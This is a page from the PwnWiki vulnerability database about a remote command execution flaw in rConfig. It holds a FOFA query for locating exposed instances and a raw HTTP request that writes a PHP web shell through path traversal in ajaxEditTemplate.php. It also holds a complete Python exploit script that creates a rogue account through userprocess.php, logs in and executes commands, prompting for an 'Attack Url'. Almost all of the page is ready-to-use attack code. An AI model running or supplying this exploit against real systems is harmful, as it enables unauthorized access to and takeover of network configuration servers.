免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
Vulnerability Impact
rConfig
FOFA
app="rConfig"
POC
POST /lib/ajaxHandlers/ajaxEditTemplate.php HTTP/1.1
Host:
Cookie: PHPSESSID=fv8j4c6r4gofug1vr9v3efdvj7
Content-Length: 81
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Origin: https://176.62.195.243
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://176.62.195.243/lib/ajaxHandlers/ajaxEditTemplate.php
fileName=../www/test.php&code=<?php echo system('id');?>&id=1
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech
import base64
import requests
import random
import re
import json
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests_toolbelt.multipart.encoder import MultipartEncoder
def title():
print('+------------------------------------------')
print('+ \03334mPOC_Des: http://wiki.peiqi.tech \0330m')
print('+ \03334mGithub : https://github.com/PeiQi0 \0330m')
print('+ \03334m公众号 : PeiQi文库 \0330m')
print('+ \03334mVersion: rConfig ajaxEditTemplate.php 后台远程命令执行 \0330m')
print('+ \03336m使用格式: python3 poc.py \0330m')
print('+ \03336mUrl >>> http://xxx.xxx.xxx.xxx \0330m')
print('+------------------------------------------')
def POC_1(target_url):
vuln_url = target_url + "/lib/crud/userprocess.php"
referer = target_url + "useradmin.php"
ran_number = random.randint(1, 999)
origin = target_url
multipart_data = MultipartEncoder(
fields={
'username': 'testtest{}'.format(ran_number),
'password': 'email protected{}'.format(ran_number),
'passconf': 'email protected{}'.format(ran_number),
'email': 'testtest{}@test.com'.format(ran_number),
'ulevelid': '9',
'add': 'add',
'editid': ''
}
)
headers = {'Content-Type': multipart_data.content_type, "Upgrade-Insecure-Requests": "1", "Referer": referer,
"Origin": origin}
cookies = {'PHPSESSID': 'test'}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(vuln_url, data=multipart_data, verify=False, cookies=cookies, headers=headers, allow_redirects=False)
if "error" not in response.text:
username = 'testtest{}'.format(ran_number)
password = 'email protected{}'.format(ran_number)
print("\03336mo 成功创建账户 testtest{}/email protected{} \0330m".format(ran_number, ran_number))
POC_2(target_url, username, password)
else:
print("\03331mx 创建失败:{} \0330m")
except Exception as e:
print("\03331mx 请求失败:{} \0330m".format(e))
sys.exit(0)
def POC_2(target_url, username, password):
print("\03336mo 正在登陆账户..... \0330m")
vuln_url = target_url + "/lib/crud/userprocess.php"
headers = {
'Content-Type': "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": target_url + "deviceConnTemplates.php",
"Origin": target_url,
"X-Requested-With": "XMLHttpRequest",
"Accept-Language": "en-US,en;q=0.5"
}
data = {
'user': username,
'pass': password,
'sublogin': '1'
}
try:
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
print("\03336mo 正在尝试执行 id....\0330m")
with requests.Session() as s:
p = s.post(target_url + '/lib/crud/userprocess.php', data=data, verify=False)
if "Stephen Stack" in p.text:
print("\03331mx 登录失败 \0330m")
else:
data = "fileName=..%2Fwww%2Ftest.php&code=%3C%3Fphp+echo+system%28%27id%27%29%3B%3F%3E&id=1"
rce = s.post(target_url + '/lib/ajaxHandlers/ajaxEditTemplate.php', verify=False, data=data,
headers=headers)
if "success" in rce.text:
response = s.get(target_url + '/test.php.yml', verify=False)
print("\03336mo 成功执行 id, 响应为:\n{} \0330m".format(response.text))
else:
print("\03331mx 请求失败 \0330m")
except Exception as e:
print("\03331mx 请求失败:{} \0330m".format(e))
sys.exit(0)
if __name__ == '__main__':
title()
target_url = str(input("\03335mPlease input Attack Url\nUrl >>> \0330m"))
POC_1(target_url)
Reference
免费、自由、人人可编辑的漏洞库--PwnWiki.com
